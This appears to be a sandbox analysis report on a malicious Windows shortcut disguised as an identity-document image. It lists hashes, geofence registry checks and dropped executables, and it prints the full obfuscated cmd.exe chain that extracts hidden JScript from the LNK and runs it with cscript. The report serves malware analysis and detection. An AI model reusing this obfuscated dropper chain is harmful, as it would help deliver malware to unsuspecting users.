Analysis
-
max time kernel
141s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20220310-en -
submitted
17-03-2022 13:21
Behavioral task
behavioral1
Sample
CopyIdentityLicense.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
CopyIdentityLicense.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral3
Sample
CopySwisscomstatement.pdf
Resource
win7-20220311-en
Behavioral task
behavioral4
Sample
CopySwisscomstatement.pdf
Resource
win10v2004-20220310-en
General
-
Target
CopyIdentityLicense.jpg.lnk
-
Size
602KB
-
MD5
d1f069c6021aba84d1fa010295312315
-
SHA1
85f3f53c12a8bb7d9525b5d30ec51fdc354c1a21
-
SHA256
a0ec772fd0d24ce6e5c8ffd9ec018f3b2463d6d0246d8cb9b8bbbe9230dba330
-
SHA512
710be7d2ad7f1ad2416b29b4d4b6ebd335ecdeb778b41ea2e12a3b4ef6a6df4f2e5908117b58a15e96dfde8e3bf79b7da6ba362b915ffb33e9aef904df91edf9
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
main.exeRdrCER.exepid process 240 main.exe 2556 RdrCER.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execscript.exemain.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation main.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
Processes:
cmd.exepid process 4700 cmd.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execscript.exemain.exedescription pid process target process PID 4616 wrote to memory of 364 4616 cmd.exe cmd.exe PID 4616 wrote to memory of 364 4616 cmd.exe cmd.exe PID 364 wrote to memory of 580 364 cmd.exe PING.EXE PID 364 wrote to memory of 580 364 cmd.exe PING.EXE PID 364 wrote to memory of 4464 364 cmd.exe cmd.exe PID 364 wrote to memory of 4464 364 cmd.exe cmd.exe PID 4464 wrote to memory of 4528 4464 cmd.exe fc.exe PID 4464 wrote to memory of 4528 4464 cmd.exe fc.exe PID 4464 wrote to memory of 2116 4464 cmd.exe cmd.exe PID 4464 wrote to memory of 2116 4464 cmd.exe cmd.exe PID 2116 wrote to memory of 1424 2116 cmd.exe chkdsk.exe PID 2116 wrote to memory of 1424 2116 cmd.exe chkdsk.exe PID 2116 wrote to memory of 1240 2116 cmd.exe cmd.exe PID 2116 wrote to memory of 1240 2116 cmd.exe cmd.exe PID 2116 wrote to memory of 1328 2116 cmd.exe find.exe PID 2116 wrote to memory of 1328 2116 cmd.exe find.exe PID 2116 wrote to memory of 4700 2116 cmd.exe cmd.exe PID 2116 wrote to memory of 4700 2116 cmd.exe cmd.exe PID 4700 wrote to memory of 3660 4700 cmd.exe sort.exe PID 4700 wrote to memory of 3660 4700 cmd.exe sort.exe PID 4700 wrote to memory of 928 4700 cmd.exe cmd.exe PID 4700 wrote to memory of 928 4700 cmd.exe cmd.exe PID 928 wrote to memory of 4284 928 cmd.exe cscript.exe PID 928 wrote to memory of 4284 928 cmd.exe cscript.exe PID 4284 wrote to memory of 3864 4284 cscript.exe cscript.exe PID 4284 wrote to memory of 3864 4284 cscript.exe cscript.exe PID 240 wrote to memory of 2556 240 main.exe RdrCER.exe PID 240 wrote to memory of 2556 240 main.exe RdrCER.exe PID 240 wrote to memory of 2556 240 main.exe RdrCER.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\CopyIdentityLicense.jpg.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping /? & set yc=Ve& cmd /c "echo hello& set he=cS& set lq=%cd%& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//^& (for /d %i in ("%ua%%pv%%eo%") do echo ok ^& for %e in ("%i\Co*pg*") do cd %i ^& set u=1) ^& set bm=cr^& chkdsk /? ^& set pl=cO^& set ox=:J^& type "Co*pg*"^|find "VER1"^>"%ua%wct7ZD7ASHB.%gd%" ^& cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" ^& echo dn""""2⤵
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\system32\PING.EXEping /?3⤵
- Runs ping.exe
PID:580 -
C:\Windows\system32\cmd.execmd /c "echo hello& set he=cS& set lq=C:\Users\Admin\AppData\Local\Temp& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn""""3⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\system32\fc.exefc4⤵PID:4528
-
C:\Windows\system32\cmd.execmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run & (if not %u%==1 (%ne%Ve /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) & sort /? & cd %lq% & date /? & set zu=%he%%bm%%eo%t & cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn"""4⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\chkdsk.exechkdsk /?5⤵PID:1424
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "Co*pg*""5⤵PID:1240
-
C:\Windows\system32\find.exefind "VER1"5⤵PID:1328
-
C:\Windows\system32\cmd.execmd /c " title run & (if not %u%==1 (mOVe /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\") else (%pl%Py /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\" )) & sort /? & cd C:\Users\Admin\AppData\Local\Temp & date /? & set zu=cS%bm%ipt & cmd /c " %zu% "%gp%E%ox%S%bm%ipt" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat"5⤵
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\sort.exesort /?6⤵PID:3660
-
C:\Windows\system32\cmd.execmd /c " %zu% "//E:JScript" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat6⤵
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\system32\cscript.execScript "//E:JScript" C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.dat"8⤵PID:3864
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exeC:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe -p"29GGZr" -sp"""NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy"" ""devDISMWKI.tmp"" ""ODgyNzQ3"" ""MTAuMC4xOTA0MQ%3D%3D"" 0 ""65C36820"" ""OTM0MzE1bGN5ZmJ9dGVoclVYUF0%3D"" 0"1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe" "NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy" "devDISMWKI.tmp" "ODgyNzQ3" "MTAuMC4xOTA0MQ%3D%3D" 0 "65C36820" "OTM0MzE1bGN5ZmJ9dGVoclVYUF0%3D" 02⤵
- Executes dropped EXE
PID:2556
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exeMD5
e1b17e3ed49f8b4f08c9bef6e17c4a47
SHA1f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8
SHA256c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5
SHA512e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.datMD5
59ccd44bbee1ab8e2a93f5e336938990
SHA1cc840273d4c785de3f43bf69d0ea1d5a166bcd44
SHA256a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f
SHA5122f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exeMD5
f3faa3ce284dea4709353aa4fd17b11e
SHA13903fc1d299e435288f123e538f2a3912e5f5813
SHA2561ddd3a76aa87e3b122da83119abc270cc3e6109f41e4a96dc7b6260162e75f31
SHA512fae7a385b8da1dadc66b2a296976fcc683f0fa829812237359cae9d3304eeafb1d582fe5ddcd0ba365cf85735ec577686136bd442e77b1efc792188860a918c2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exeMD5
f3faa3ce284dea4709353aa4fd17b11e
SHA13903fc1d299e435288f123e538f2a3912e5f5813
SHA2561ddd3a76aa87e3b122da83119abc270cc3e6109f41e4a96dc7b6260162e75f31
SHA512fae7a385b8da1dadc66b2a296976fcc683f0fa829812237359cae9d3304eeafb1d582fe5ddcd0ba365cf85735ec577686136bd442e77b1efc792188860a918c2
-
C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.datMD5
59ccd44bbee1ab8e2a93f5e336938990
SHA1cc840273d4c785de3f43bf69d0ea1d5a166bcd44
SHA256a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f
SHA5122f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83